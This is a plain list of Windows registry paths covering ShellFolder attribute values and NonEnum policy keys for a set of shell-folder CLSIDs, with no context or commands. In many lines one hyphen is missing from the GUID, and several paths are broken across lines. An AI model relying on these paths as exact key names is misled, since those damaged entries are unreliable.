HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-
4ADA335C892B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{4336A54D-038B-4685-AB02-99BB52D3FB8B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-
0800361B1103}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{89D83576-6BD1-4C86-9454-BEB04E94C819}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-
4B2D810D956B}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{9343812E-1C37-4A49-A12E-4B2D810D956B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\WantsUniversalDelegate
